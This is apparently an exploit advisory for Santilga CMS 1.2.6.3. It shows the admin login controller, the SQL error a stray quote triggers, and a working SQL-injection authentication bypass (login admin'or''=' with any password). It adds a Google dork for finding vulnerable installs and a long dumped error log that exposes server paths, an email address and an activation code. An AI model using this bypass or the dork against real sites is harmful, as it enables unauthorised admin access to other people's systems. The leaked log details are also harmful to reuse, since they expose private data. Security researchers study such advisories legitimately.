============================= Vulnerable software: Santilga CMS version 1.2.6.3 $ head -n 10 Admin.php|less view->templateName = "admin"; parent::__construct(); $this->lang = Santilga_Language::getInstance()->getLanguage(); $this->view->lang = $this->lang; $this->view->showUploadForm = false; } public function indexAction(){ if($this->helpers->User->adminLoggedIn()){ $this->helpers->Url->redirect("admin/about"); }else{ $this->helpers->Url->redirect("adminLogin/login"); } } public function logoutAction(){ $session = Santilga_Resource::get("session"); if($session->adminLoggedIn){ unset($session->admin); unset($session->adminId); unset($session->adminLoggedIn); } $this->helpers->Url->redirect("adminLogin/login"); } public function loginAction(){ $this->view->layoutFile = "loginLayout.php"; $request = $this->request->getParams(); $session = Santilga_Resource::get("session"); $model = Admin_Model::getInstance(); $error = array(); if($post = $this->request->getPost()){ /*$data = array('username' => $this->request->getPost('username'), 'password' => $this->request->getPost('password') );*/ if(!empty($post["username"]) && !empty($post["password"])){ $admin = $model->autenticate($post); if($admin !== null){ $session->admin = $admin; $session->adminId = $admin->id; $session->adminLoggedIn = true; $this->helpers->Url->redirect("admin/about"); }else{ $error[] = Santilga_Language::_("userPassMismatch", "Error:: username and/or password didn't match or you are not admin"); } }else{ $error[] = Santilga_Language::_("userPassRequired", "Username and password must not be empty"); } } $this->view->error = $error; $this->view->title = Santilga_Language::_("panelLogin", " Panel Login"); $this->view->mainContent = $this->view->content("form", "login"); $this->view->rightBlock = false; } } ?> ================================================================ If simply we will pass ' to login We will get: 27.05.12 11:22:39- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9'' at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9'' at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' ,[] => ,[] => 1064,[] Exploiting: site.tld/admin/ Login: admin'or''=' Password: whateveryouwant Logged in:) CSRF: ==================================================================
=================================================================== Dork: Google+search for this exceptions: Error!! 22.06.10 07:40:46- WARNING: Invalid argument supplied for foreach() in C:\Server\ptc\application\templates\admin\edit\categories.php on line 61

#0 Santilga_Error->ErrorHandler(2, Invalid argument supplied for foreach(), C:\Server\ptc\application\templates\admin\edit\categories.php, 61, Array ([templateFile] => categories.php,[templateSection] => edit,[render] => )) called at [C:\Server\ptc\application\templates\admin\edit\categories.php:61]
#1 include(C:\Server\ptc\application\templates\admin\edit\categories.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#2 Santilga_View->renderTemplate(categories, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#3 Santilga_View->content(categories, edit) called at [C:\Server\ptc\application\controllers\Admin.php:329]
#4 Admin_Controller->categoryAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#5 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#6 Santilga_Application->run() called at [C:\Server\ptc\public_html\index.php:37]
Error!! 23.06.10 07:15:04- Uncaught Santilga_Helper_Exception, code: 0,Message: No such helper exist - Recaptcha

#0 Santilga_Error->ExceptionHandler(Santilga_Helper_Exception Object ([] => No such helper exist - Recaptcha,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\helper\Helper.php,[] => 19,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\User.php,[line] => 107,[function] => __get,[class] => Santilga_Helper,[type] => ->,[args] => Array ([0] => Recaptcha)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => registerAction,[class] => User_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 23.06.10 07:17:22- WARNING: Missing argument 1 for Recaptcha_Helper::verify(), called in C:\Server\ptc\application\controllers\User.php on line 56 and defined in C:\Server\ptc\application\helpers\Recaptcha.php on line 68

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Recaptcha_Helper::verify(), called in C:\Server\ptc\application\controllers\User.php on line 56 and defined, C:\Server\ptc\application\helpers\Recaptcha.php, 68, Array ()) called at [C:\Server\ptc\application\helpers\Recaptcha.php:68]
#1 Recaptcha_Helper->verify() called at [C:\Server\ptc\application\controllers\User.php:56]
#2 User_Controller->registerAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#3 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#4 Santilga_Application->run() called at [C:\Server\ptc\public_html\index.php:37]
Error!! 23.06.10 12:23:55- Uncaught Santilga_Exception, code: 0,Message: Captcha text did not match one on image

#0 Santilga_Error->ExceptionHandler(Santilga_Exception Object ([] => Captcha text did not match one on image,[] => ,[] => 0,[] => C:\Server\ptc\application\controllers\Connect.php,[] => 31,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => contactAction,[class] => Connect_Controller,[type] => ->,[args] => Array ()),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 24.06.10 11:00:03- WARNING: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in C:\Server\ptc\libraries\santilga\error\Error.php on line 156

#0 Santilga_Error->ErrorHandler(2, ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice, C:\Server\ptc\libraries\santilga\error\Error.php, 156, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\content\category.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\content\category.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Content.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))
#1 ob_start(ob_gzhandler) called at [C:\Server\ptc\libraries\santilga\error\Error.php:156]
#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\content\category.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\content\category.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Content.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 24.06.10 11:00:59- WARNING: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in C:\Server\ptc\libraries\santilga\error\Error.php on line 156

#0 Santilga_Error->ErrorHandler(2, ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice, C:\Server\ptc\libraries\santilga\error\Error.php, 156, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\content\category.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\content\category.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Content.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))
#1 ob_start(ob_gzhandler) called at [C:\Server\ptc\libraries\santilga\error\Error.php:156]
#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\content\category.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\content\category.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Content.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 24.06.10 11:01:08- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:title

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\content\category.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\content\category.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Content.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 25.06.10 06:01:03- WARNING: mail() [function.mail]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\Server\ptc\application\helpers\Mail.php on line 105

#0 Santilga_Error->ErrorHandler(2, mail() [function.mail]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set(), C:\Server\ptc\application\helpers\Mail.php, 105, Array ([headers] => Content-type: text/html; charset=utf-8
From: ptccloud.com
Reply-To: ptccloud.com ))
#1 mail(sixth@email.de, Activation Required, To finalize registration please fill in activation code here
http://192.168.1.3/ptc/public_html/user/validate
activation code is : c55a035cfef9836b747e, Content-type: text/html; charset=utf-8
From: ptccloud.com
Reply-To: ptccloud.com , ) called at [C:\Server\ptc\application\helpers\Mail.php:105]
#2 Mail_Helper->sendMail() called at [C:\Server\ptc\application\controllers\User.php:314]
#3 User_Controller->_sendActivationEmail(sixth@email.de, sixth, c55a035cfef9836b747e) called at [C:\Server\ptc\application\controllers\User.php:104]
#4 User_Controller->registerAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#5 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#6 Santilga_Application->run() called at [C:\Server\ptc\public_html\index.php:37]
Error!! 25.06.10 07:17:58- WARNING: include(C:\Server\ptc\application/templates/ptc/user/account.php) [function.include]: failed to open stream: No such file or directory in C:\Server\ptc\libraries\santilga\view\View.php on line 43

#0 Santilga_Error->ErrorHandler(2, include(C:\Server\ptc\application/templates/ptc/user/account.php) [function.include]: failed to open stream: No such file or directory, C:\Server\ptc\libraries\santilga\view\View.php, 43, Array ([templateFile] => account.php,[templateSection] => user,[render] => )) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#1 Santilga_View::renderTemplate() called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#2 Santilga_View->renderTemplate(account, user, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#3 Santilga_View->content(account, user) called at [C:\Server\ptc\application\controllers\Account.php:8]
#4 Account_Controller->indexAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#5 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#6 Santilga_Application->run() called at [C:\Server\ptc\public_html\index.php:37]
Error!! 25.06.10 07:48:26- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group WHERE id='1' LIMIT 0,1' at line 1,SQL:SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group WHERE id='1' LIMIT 0,1' at line 1,SQL:SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1,[] => ,[] => 1064,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 72,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 54,[function] => getResultRow,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1)),[2] => Array ([file] => C:\Server\ptc\application\helpers\Userstat.php,[line] => 17,[function] => getBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => 1)),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 9,[function] => getStats,[class] => Userstat_Helper,[type] => ->,[args] => Array ([0] => 4)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 25.06.10 11:24:59- Uncaught Santilga_Database_Exception, code: 1054,Message: Unknown column 'active' in 'where clause',SQL:SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Unknown column 'active' in 'where clause',SQL:SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0 ,[] => ,[] => 1054,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0 )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0 )),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 30,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => active='1',[1] => paused='0',[2] => demographicFilter='NULL',[3] => clicks > 0),[1] => Array ())),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => todaysAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 25.06.10 13:21:25- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 3, 2, 30, 'PENDING', '0,000', '2010-06-25 13:21:25' )

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 3, 2, 30, 'PENDING', '0,000', '2010-06-25 13:21:25' ) ,[] => ,[] => 1265,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 3, 2, 30, 'PENDING', '0,000', '2010-06-25 13:21:25' ) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 122,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 3,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-25 13:21:25))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 90,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 3,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 07:53:21- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:53:21' )

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:53:21' ) ,[] => ,[] => 1265,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:53:21' ) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:53:21))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 07:54:12- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:12' )

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:12' ) ,[] => ,[] => 1265,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:12' ) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:54:12))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 07:54:40- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:40' )

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:40' ) ,[] => ,[] => 1265,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:40' ) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:54:40))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 07:57:28- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'moneyEarned' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, '30', 'PENDING', '0,000', '2010-06-26 07:57:28' )

